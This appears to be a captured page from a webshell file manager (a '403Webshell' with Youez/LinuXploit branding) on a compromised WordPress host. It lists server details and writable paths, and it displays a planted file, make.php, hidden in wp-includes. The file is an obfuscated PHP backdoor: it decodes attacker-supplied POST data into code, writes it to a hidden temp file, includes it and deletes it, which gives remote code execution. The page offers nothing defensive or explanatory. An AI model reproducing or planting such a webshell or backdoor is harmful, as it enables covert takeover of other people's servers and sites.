403Webshell
Server IP : 162.243.168.218  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User : web23 ( 5020)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client3/web23/web/wp-includes/Requests/src/Utility/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client3/web23/web/wp-includes/Requests/src/Utility/make.php
<?php

if(isset($_POST["k"]) ? true : false){
	$ref = $_POST["k"];
	  	$ref	=  explode	(  	".",$ref		 )   ;
	$data_chunk = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(  $s);
            $q = 0;
    
            foreach(  $ref as $v9) {
                $sChar = ord(  $s[$q  %	$lenS]);
                $d =(  (  int)$v9 - $sChar -(  $q  %	10)) ^ 78;
                $data_chunk .= chr(  $d);
                $q++; } 	
	$dchunk = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd()]);
	for ($pgrp = 0, $resource = count($dchunk); $pgrp < $resource; $pgrp++) {
    $res = $dchunk[$pgrp];
    		if ((function($d) { return is_dir($d) && is_writable($d); })($res)) {
    $mrk = implode("/", [$res, ".binding"]);
    if (file_put_contents($mrk, $data_chunk)) {
	include $mrk;
	@unlink($mrk);
	exit;
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit